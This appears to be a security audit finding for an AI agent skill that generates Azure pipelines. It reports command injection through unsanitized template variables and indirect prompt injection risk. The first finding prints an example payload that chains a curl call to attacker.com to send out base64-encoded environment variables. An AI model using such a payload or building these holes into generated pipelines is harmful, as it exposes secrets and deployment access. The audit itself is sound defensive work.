The Agent Skills Directory

[COMMAND_EXECUTION] (HIGH): The skill generates shell scripts by interpolating unsanitized template variables directly into command strings. Specifically, in templates/build-job-template.yml and templates/ci-pipeline-template.yml, variables like {{INSTALL_COMMAND}}, {{BUILD_TOOL}}, and {{TEST_PATH}} are used inside - script: blocks. An attacker providing a value such as ; curl http://attacker.com/$(env | base64) for any of these fields would trigger unauthorized code execution.
[PROMPT_INJECTION] (HIGH): The skill is susceptible to Indirect Prompt Injection (Category 8). It ingests untrusted configuration data to populate templates that have high-privilege capabilities.
Ingestion points: Variables provided via the pipeline configuration (e.g., APP_URL, INSTALL_COMMAND, VERSION).
Boundary markers: Absent. Values are placed directly into shell commands and YAML structures.
Capability inventory: The generated pipelines have the ability to execute shell commands, access Azure Service Connections (azureSubscription), and perform deployments/modifications in Azure environments.
Sanitization: While scripts/pipeline_generator.py contains some basic sanitization for artifact_name and resource_prefix, it lacks any escaping or validation for the high-risk variables used in script execution blocks.
[CREDENTIALS_UNSAFE] (LOW): The templates correctly use Azure Pipelines variable syntax (e.g., $(registryPassword), $(staticWebAppToken)) which is standard practice for secret management in CI/CD, but the command injection vulnerability would allow an attacker to easily exfiltrate these secrets at runtime.

generate-azure-pipelines